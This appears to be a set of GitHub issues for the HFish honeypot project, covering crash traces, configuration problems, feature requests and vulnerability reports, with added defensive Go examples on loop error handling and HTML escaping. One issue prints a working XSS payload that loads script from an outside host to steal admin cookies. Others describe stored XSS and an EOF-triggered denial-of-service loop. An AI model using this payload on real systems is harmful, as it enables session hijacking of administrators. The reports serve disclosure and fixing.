hacklcx / hfish
A secure, reliable, simple and free enterprise-grade honeypot
Home Page: https://hfish.io
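The Docker image is still at 0.5; could you please update it?
1. Sending email does not work.
Output: [GIN] 2020/03/10 - 16:18:30 | 200 | 425.828µs | 10.32.166.24 | GET /get/setting/info?id=1
[HFish] 127.0.0.1 - [2020-03-10 16:18:42] 发送邮件通知失败 [EOF]
2. The client connects normally and works normally, and the hooked list has entries, but the distributed list shows no information.
HFish 0.6 adds the new setting "密码脱敏符号设置" (password masking symbol setting).
When this item is empty, startup fails. Please fix this.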
INSERT INTO hfish_setting
VALUES ('1', 'passwdTM', '', '2019-09-02 20:15:00', '0', '密码脱敏符号设置', '密码脱敏符号设置')
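Our company mail system does not support sending mail over a secure connection; I hope a configuration for sending plain mail can be added.
With the default web honeypot, enter an XSS payload, and the payload is triggered when it is viewed in the honeypot admin backend.
I suggest adding a reporting feature, for example importing IP addresses and their corresponding regions; if the brute-forced passwords are somewhat complex, the password dictionary could be exported.
Can the web honeypot use a custom page, to disguise it as some other login page?
The error message is as follows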
redis 231
更新数据失败
panic: database is locked
goroutine 296 [running]:
HFish/error.Check(...)
/root/go/HFish/error/error.go:11
HFish/core/dbUtil.Update(0xccbb17, 0x32, 0xc0000a1f90, 0x2, 0x2, 0x0)
/root/go/HFish/core/dbUtil/dbUtil.go:89 +0x338
HFish/core/report.ReportUpdateRedis(0xc0001a91eb, 0x3, 0xc00024a980, 0xb)
/root/go/HFish/core/report/report.go:249 +0x109
created by HFish/core/protocol/redis.handleConnection.func5
/root/go/HFish/core/protocol/redis/redis.go:112 +0x23e
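As the title says: being able to trace machines infected with the EternalBlue virus.
The honeypot records data by calling JS. After we change the API address and the key value, one only needs to find the JS that the HTML page calls in order to find these two values.
The Redis monitoring backend does not print anything.
Environment: releases0.5.1 + MySQL mode
Suggestions:
1. Make geolocation information something that can be enabled or disabled via a setting;
2. Do not record geolocation information repeatedly for the same IP, to reduce database size; ideally record locations in a separate table, referenced by ID;
3. The parameters of the SSH high-interaction mode should be configurable via variables;
4. Record duplicate account/password pairs in hfish_passwd only once, to reduce database size;
5. project_name in hfish_info would be better defined in a separate table and referenced by ID, to reduce database size;
6. The API could gain some query parameters, for example a time range for the blacklist API and a top-N query for the password API.
I'm a beginner. It has been quite comfortable to use so far, I have starred it, and I hope the maintainers keep maintaining it.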
更新上钩信息失败 [Error 1267: Illegal mix of collations (utf8mb4_general_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation 'concat']
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.
[GIN-debug] Loaded HTML Templates (2):
-
- index.html
[GIN-debug] GET /static/*filepath --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)
[GIN-debug] HEAD /static/*filepath --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)
[GIN-debug] GET / --> HFish/utils/setting.RunDeep.func1 (2 handlers)
[GIN-debug] POST /api/v1/post/deep_report --> HFish/view/api.ReportDeepWeb (3 handlers)
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.
[GIN-debug] POST /api/v1/post/plug_report --> HFish/view/api.ReportPlugWeb (3 handlers)
panic: interface conversion: interface {} is nil, not int64
goroutine 1 [running]:
HFish/utils/setting.initCahe()
/ext-go/1/src/HFish/utils/setting/setting.go:159 +0xcec
HFish/utils/setting.Run()
/ext-go/1/src/HFish/utils/setting/setting.go:392 +0xf00
main.main()
/ext-go/1/src/HFish/main.go:22 +0x1c3
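I start this honeypot over SSH. How can I keep it running in the background so that it stays online after I exit SSH?
When using a sub-directory behind a reverse proxy, absolute paths cause some problems; I suggest changing them to relative paths.
For example, when not logged in, visiting http://example.com/hfish/ redirects to http://example.com/login instead of http://example.com/hfish/login
The same goes for page resources.
Thanks.
Version: v0.3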
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x38 pc=0x9bc1d0]
goroutine 11364 [running]:
sync.(*RWMutex).RLock(...)
/usr/local/go/src/sync/rwmutex.go:48
database/sql.(*Stmt).ExecContext(0x0, 0xddfbe0, 0xc000094020, 0xc00379bf90, 0x2, 0x2, 0x0, 0x0, 0x0, 0x0)
/usr/local/go/src/database/sql/sql.go:2307 +0x50
database/sql.(*Stmt).Exec(...)
/usr/local/go/src/database/sql/sql.go:2336
HFish/core/dbUtil.Update(0xcca995, 0x32, 0xc00379bf90, 0x2, 0x2, 0x0)
/ext-go/1/src/HFish/core/dbUtil/dbUtil.go:87 +0xd9
HFish/core/report.ReportUpdateSSH(0xc0002da0d4, 0x4, 0xcaa51c, 0x2)
/ext-go/1/src/HFish/core/report/report.go:227 +0x109
created by HFish/core/protocol/ssh.Start.func1
/ext-go/1/src/HFish/core/protocol/ssh/ssh.go:59 +0x5b4
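How about adding a raw log export feature in the admin backend, so the logs can be used for other analysis?
For services like SSH and FTP, a password collection feature could be added, to collect a batch of dictionaries.
github.com/panjf2000/ants v1.2.0 fails to download with go mod download; after upgrading to 1.3.0 it succeeds, but running the code then fails with an error. Details below: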
[GIN-debug] POST /api/v1/post/plug_report --> HFish/view/api.ReportPlugWeb (3 handlers)
panic: interface conversion: interface {} is nil, not int64
goroutine 1 [running]:
HFish/utils/setting.initCahe()
E:/GoProject/src/HFish-0.5/utils/setting/setting.go:155 +0x846
HFish/utils/setting.Run()
E:/GoProject/src/HFish-0.5/utils/setting/setting.go:369 +0xec0
main.main()
E:/GoProject/src/HFish-0.5/main.go:10 +0x2d
exit status 2
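A forced disconnect causes the server to go down.
The honeypot's SSH service does not handle errors when accepting user terminal input. As a result, when an attacker types Ctrl+D (EOF),
line, _ = term.ReadLine()
returns an error, but the loop does not end. This results in an infinite loop that endlessly executes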
if is.Rpc() {
    id = client.ReportResult("SSH", "", arr[0], info, "0")
} else {
    id = strconv.FormatInt(report.ReportSSH(arr[0], "本机", info), 10)
}
This causes a DDoS: the honeypot server denies service, and a large amount of junk data is produced in the database.
macOS Catalina 10.15.3
go1.13.4 darwin/amd64
Handle the error from term.ReadLine(), as follows:
if err != nil {
    break
}
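The failure mode and the fix from this report, reduced to a self-contained added example (not HFish's code). `lineReader`, `fakeTerm`, `newTerm`, `sessionLoop` and the sample session are hypothetical names and data constructed here; the real loop reads from the SSH terminal and writes each command to the database.

```go
package main

import (
	"bufio"
	"errors"
	"fmt"
	"io"
	"strings"
)

// lineReader is the single terminal method the command loop depends on.
type lineReader interface{ ReadLine() (string, error) }

// fakeTerm is a constructed stand-in for the SSH terminal.
type fakeTerm struct{ r *bufio.Reader }

func newTerm(in string) *fakeTerm { return &fakeTerm{bufio.NewReader(strings.NewReader(in))} }

func (t *fakeTerm) ReadLine() (string, error) {
	s, err := t.r.ReadString('\n')
	if err != nil {
		return "", err // io.EOF once the client sends Ctrl+D or disconnects
	}
	return strings.TrimRight(s, "\r\n"), nil
}

// sessionLoop returns how many reports it wrote. checkErr=false mimics
// `line, _ = term.ReadLine()`; maxIter only exists so that case terminates.
func sessionLoop(t lineReader, checkErr bool, maxIter int) (int, error) {
	reports := 0
	for i := 0; i < maxIter; i++ {
		line, err := t.ReadLine()
		if err != nil && checkErr {
			if errors.Is(err, io.EOF) {
				return reports, nil // normal end of session
			}
			return reports, err // any other terminal error also ends it
		}
		_ = line // the honeypot would store the command here
		reports++
	}
	return reports, errors.New("iteration cap reached: loop never ended on its own")
}

func main() {
	in := "whoami\nuname -a\n" // constructed session; EOF follows
	fmt.Println(sessionLoop(newTerm(in), false, 1000))
	fmt.Println(sessionLoop(newTerm(in), true, 1000))
}
```

With the error ignored, every iteration after EOF writes another empty report until the cap is hit; with the check, the loop ends after the two real commands.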
An error occurs when attempting an FTP connection
panic: runtime error: invalid memory address or nil pointer dereference
[signal 0xc0000005 code=0x0 addr=0x0 pc=0xa52d9e]
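Environment: releases 0.6 + MySQL mode
When the cluster connects over IPv6, the cluster list cannot display the IP correctly, and the hooked list probably cannot display the IP correctly either.
I suggest adding support for this, thanks.
For example, filter by length, or filter by whether the login succeeded (this one is quite useful: it can pick out the successful logins so their further behavior can be analyzed).
Hello, with the latest version I cannot get the honeypot's SSH to start no matter what. I tried both the Docker container and the binary, and in both cases SSH does not work while everything else is OK. I tried both changing the sshd port on my host and stopping the sshd service. Could you take a look at what is going on?
Environment:
The system is a clean minimal install of CentOS 7, with SELinux disabled and firewalld turned off.
Configuration file: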
[root@hello HFish-0.3-linux-amd64]# cat config.ini
[rpc]
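status = 0 # Mode: 0 off, 1 server, 2 client
addr = 127.0.0.1:7879 # RPC server address or client address
name = Server # Server name when status is 1; client name when status is 2
[admin] # When RPC status is 2 (cluster client), admin can be removed
addr = 0.0.0.0:9001 # Admin backend listen address
account = admin # Login account
password = admin # Login password
[api]
status = 0 # Enable the API: 0 off, 1 on
web_url = /api/v1/post/report # Web honeypot report API
deep_url = /api/v1/post/deep_report # Dark web honeypot report API
plug_url = /api/v1/post/plug_report # Plugin honeypot report API
sec_key = 9cbf8a4dcb8e30682b927f352d6559a0 # API authentication key
[plug]
status = 0 # Enable the honeypot plugin: 0 off, 1 on; the API must be started first
addr = 0.0.0.0:8989 # Honeypot plugin listen address
[web]
status = 1 # Enable WEB: 1 on, 0 off; WEB can report results only after the API is started
addr = 0.0.0.0:80 # WEB listen address; 0.0.0.0 is open externally, 127.0.0.1 is internal only and can sit behind an Nginx reverse proxy
template = wordPress/html # WEB template path
index = index.html # WEB home page file
static = wordPress/static # WEB static file path. Note: two directories must exist; the html files and the static files cannot be at the same level
url = / # WEB access path, default /; can be changed to index.html index.asp index.php
[deep]
status = 1 # Enable the dark web honeypot: 1 on, 0 off; it can report results only after the API is started
addr = 0.0.0.0:8080 # Dark web WEB listen address
template = deep/html # Dark web WEB template path
index = index.html # Dark web WEB home page file
static = deep/static # Dark web WEB static file path. Note: two directories must exist; the html files and the static files cannot be at the same level
url = / # Dark web WEB access path, default /; can be changed to index.html index.asp index.php
[ssh]
status = 2 # Enable SSH: 0 off, 1 low interaction, 2 high interaction
addr = 0.0.0.0:22 # SSH server address. Watch for port conflicts: first stop the server's openssh service or change its port
[redis]
status = 1 # Enable Redis: 0 off, 1 on
addr = 0.0.0.0:6379 # Redis server address; watch for port conflicts
[mysql]
status = 1 # Enable Mysql: 0 off, 1 on
addr = 0.0.0.0:3306 # Mysql server address; watch for port conflicts
files = /etc/passwd,/etc/group # Arbitrary client files for the Mysql server to read; separate multiple entries with commas, one is picked at random
[telnet]
status = 1 # Enable Telnet: 0 off, 1 on
addr = 0.0.0.0:23 # Telnet server address; watch for port conflicts
[ftp]
status = 1 # Enable Ftp: 0 off, 1 on
addr = 0.0.0.0:21 # Ftp server address; watch for port conflicts
[mem_cache]
status = 1 # Enable MemCache: 0 off, 1 on
addr = 0.0.0.0:11211 # Memcache server address; watch for port conflicts
rate_limit = 4 # Responses per second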
[root@hello HFish-0.3-linux-amd64]#
Startup log:
[root@hello HFish-0.3-linux-amd64]# ./HFish run
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.
- using env: export GIN_MODE=release
- using code: gin.SetMode(gin.ReleaseMode)
2019/09/05 15:38:03 [Memcache TCP] Listning on 0.0.0.0:11211
[GIN-debug] Loaded HTML Templates (2):
-
- index.html
[GIN-debug] GET /static/*filepath --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)
[GIN-debug] HEAD /static/*filepath --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)
[GIN-debug] GET / --> HFish/utils/setting.RunWeb.func1 (2 handlers)
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.
- using env: export GIN_MODE=release
- using code: gin.SetMode(gin.ReleaseMode)
[GIN-debug] Loaded HTML Templates (2):
-
- index.html
[GIN-debug] GET /static/*filepath --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)
[GIN-debug] HEAD /static/*filepath --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (2 handlers)
[GIN-debug] GET / --> HFish/utils/setting.RunDeep.func1 (2 handlers)
[GIN-debug] [WARNING] Creating an Engine instance with the Logger and Recovery middleware already attached.
[GIN-debug] [WARNING] Running in "debug" mode. Switch to "release" mode in production.
- using env: export GIN_MODE=release
- using code: gin.SetMode(gin.ReleaseMode)
[GIN-debug] Loaded HTML Templates (11):
- colony.html
- footer.html
- footer
- header
- login.html
- mail.html
-
- dashboard.html
- fish.html
- header.html
- setting.html
[GIN-debug] GET /static/*filepath --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (5 handlers)
[GIN-debug] HEAD /static/*filepath --> HFish/vendor/github.com/gin-gonic/gin.(*RouterGroup).createStaticHandler.func1 (5 handlers)
[GIN-debug] GET /login --> HFish/view/login.Html (5 handlers)
[GIN-debug] POST /login --> HFish/view/login.Login (5 handlers)
[GIN-debug] GET /logout --> HFish/view/login.Logout (5 handlers)
[GIN-debug] GET / --> HFish/view/dashboard.Html (6 handlers)
[GIN-debug] GET /dashboard --> HFish/view/dashboard.Html (6 handlers)
[GIN-debug] GET /get/dashboard/data --> HFish/view/dashboard.GetFishData (6 handlers)
[GIN-debug] GET /get/dashboard/pie_data --> HFish/view/dashboard.GetFishPieData (6 handlers)
[GIN-debug] GET /fish --> HFish/view/fish.Html (6 handlers)
[GIN-debug] GET /get/fish/list --> HFish/view/fish.GetFishList (6 handlers)
[GIN-debug] GET /get/fish/info --> HFish/view/fish.GetFishInfo (6 handlers)
[GIN-debug] GET /get/fish/typeList --> HFish/view/fish.GetFishTypeInfo (6 handlers)
[GIN-debug] POST /post/fish/del --> HFish/view/fish.PostFishDel (6 handlers)
[GIN-debug] GET /colony --> HFish/view/colony.Html (6 handlers)
[GIN-debug] GET /get/colony/list --> HFish/view/colony.GetColony (6 handlers)
[GIN-debug] POST /post/colony/del --> HFish/view/colony.PostColonyDel (6 handlers)
[GIN-debug] GET /mail --> HFish/view/mail.Html (6 handlers)
[GIN-debug] POST /post/mail/sendEmail --> HFish/view/mail.SendEmailToUsers (6 handlers)
[GIN-debug] GET /setting --> HFish/view/setting.Html (6 handlers)
[GIN-debug] GET /get/setting/info --> HFish/view/setting.GetSettingInfo (6 handlers)
[GIN-debug] POST /post/setting/update --> HFish/view/setting.UpdateEmailInfo (6 handlers)
[GIN-debug] POST /post/setting/updateAlertMail --> HFish/view/setting.UpdateAlertMail (6 handlers)
[GIN-debug] POST /post/setting/checkSetting --> HFish/view/setting.UpdateStatusSetting (6 handlers)
[GIN-debug] POST /post/setting/updateWebHook --> HFish/view/setting.UpdateWebHook (6 handlers)
[GIN-debug] POST /post/setting/updateWhiteIp --> HFish/view/setting.UpdateWhiteIp (6 handlers)
[GIN-debug] GET /api/v1/get/ip --> HFish/view/api.GetIpList (6 handlers)
[GIN-debug] GET /api/v1/get/fish_info --> HFish/view/api.GetFishInfo (6 handlers)
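I think I tested it on another VPS of mine about a month ago and it worked; I don't know which version that was. This time I used the latest version and have not tested older versions.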
tail: hfish.log: file truncated
[HFish] 127.0.0.1 - [2020-03-11 16:21:28] WebHook 调用成功 []
[HFish] 127.0.0.1 - [2020-03-11 16:21:30] WebHook 调用成功 []
[HFish] 127.0.0.1 - [2020-03-11 16:21:31] WebHook 调用成功 []
[HFish] 127.0.0.1 - [2020-03-11 16:21:32] WebHook 调用成功 []
[HFish] 127.0.0.1 - [2020-03-11 16:21:50] WebHook 调用成功 []
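The recorded commands, when displayed in the admin backend, have an XSS issue.
Hi, sorry to bother you. After building with Docker, I did not map the whole directory as in /hfish/:/opt/HFish/; instead I only mapped /hfish/config.ini:/opt/HFish/config.ini. But it seems that this way, after Docker starts, it reports ./HFish not found, which suggests the directory was emptied. I hope to get a reply.
Suppose an IP accesses the server frequently; what can this project be used for in that case? Are there any concrete examples?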
打开配置文件失败 [open ./config.ini: no such file or directory]
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x58 pc=0xa2046e]
Downloaded HFish-0.6.3-linux-amd64.tar.gz
cd HFish-0.6.3-linux-amd64
./HFish run
hi! hacklcx!!! When I simulated the process of using docker to build HFish quickly in a public network server, I found unexpected problems with JS in the WEB project.
docker exec -it hfish /bin/sh
cat config.ini
[api]
status = 1 # Enable the API: 1 on, 0 off
web_url = /api/v1/post/report # Admin backend listen address
deep_url = /api/v1/post/deep_report # Admin backend listen address
Then the error shows that:
cat x.js
function report() {
var login_field = $("#user_login").val();
var password = $("#user_pass").val();
$.ajax({
type: "POST",
url: "http://localhost:9001/api/v1/post/dart_report",
In branch dev, deep_report = dart_report, so an API for dart_report is not found.
But the problem has been fixed in branch master.
I recommend using master to build the Docker image.
If you want connections from outside to feel more realistic, a small random delay should be added when the connection is first established. For example: time.Sleep(time.Millisecond * time.Duration(rand.Intn(300)))
The above comes from a bit of experience in actual use.
If you want to make the connection more realistic, there should be a small random delay. Right now the result is returned too fast.
This is the experience from actual use.
In any phishing interface, where the password needs to be entered, the use of img tags can cause XSS attacks.
Insert XSS payload where the password is entered
XSS code is triggered when the administrator views the information
Use the following code to get a cookie.
<img src=a onerror=with(document)body.appendChild(document.createElement('script')).src="//xss.re/974" height="0" width="0">
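The defensive counterpart to this report, as an added example that is not HFish's code: a captured field rendered into an admin table row without output encoding, next to the same row rendered with context-aware escaping. The `capture` type, the row template and the sample record are hypothetical and constructed here, and the example assumes the admin view is rendered server-side.

```go
package main

import (
	"fmt"
	htmltpl "html/template"
	"strings"
	texttpl "text/template"
)

// capture is a hypothetical record of one login attempt seen by the honeypot.
// Every field is attacker-controlled and must be treated as untrusted.
type capture struct{ IP, User, Password string }

const row = `<tr><td>{{.IP}}</td><td>{{.User}}</td><td>{{.Password}}</td></tr>`

// renderUnsafe builds the admin table row with no output encoding, so any
// markup in a captured field becomes part of the admin page.
func renderUnsafe(c capture) (string, error) {
	var b strings.Builder
	err := texttpl.Must(texttpl.New("row").Parse(row)).Execute(&b, c)
	return b.String(), err
}

// renderSafe uses html/template, which escapes each field for the HTML
// context it is placed in, so captured markup is shown as inert text.
func renderSafe(c capture) (string, error) {
	var b strings.Builder
	err := htmltpl.Must(htmltpl.New("row").Parse(row)).Execute(&b, c)
	return b.String(), err
}

func main() {
	// Constructed sample: markup submitted in the password field.
	c := capture{"203.0.113.7", "admin", `<img src=a onerror=alert(1)>`}
	u, _ := renderUnsafe(c)
	s, _ := renderSafe(c)
	fmt.Println("unescaped:", u)
	fmt.Println("escaped:  ", s)
}
```

If the admin page instead builds rows in the browser from JSON, the same rule applies there: insert captured values as text (for example via `textContent`), not as HTML.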
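I upgraded to 3.1 and found that local tests no longer record MySQL, SSH, Telnet and other activity. I have not yet tracked down where the problem is. Test environment: Docker, Debian.
It crashes immediately on startup. Runtime environment: 2 cores, 2 GB, CentOS 7, version 0.3.2 run as a binary.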
2019/10/11 13:22:34 worker exits from a panic: runtime error: invalid memory address or nil pointer dereference
2019/10/11 13:22:34 worker exits from a panic: runtime error: invalid memory address or nil pointer dereference
2019/10/11 13:22:34 worker exits from panic: goroutine 68 [running]:
HFish/vendor/github.com/panjf2000/ants.(*Worker).run.func1.1(0xc0005fd650)
/ext-go/1/src/HFish/vendor/github.com/panjf2000/ants/worker.go:59 +0x13e
panic(0xc571c0, 0x15d8330)
/usr/local/go/src/runtime/panic.go:522 +0x1b5
HFish/core/protocol/mysql.Start.func1()
/ext-go/1/src/HFish/core/protocol/mysql/mysql.go:66 +0x12e
HFish/vendor/github.com/panjf2000/ants.(*Worker).run.func1(0xc0005fd650)
/ext-go/1/src/HFish/vendor/github.com/panjf2000/ants/worker.go:71 +0x9b
created by HFish/vendor/github.com/panjf2000/ants.(*Worker).run
/ext-go/1/src/HFish/vendor/github.com/panjf2000/ants/worker.go:49 +0x4d
The name parameter in the data packet reported by the web honeypot's static/x.js has an XSS issue.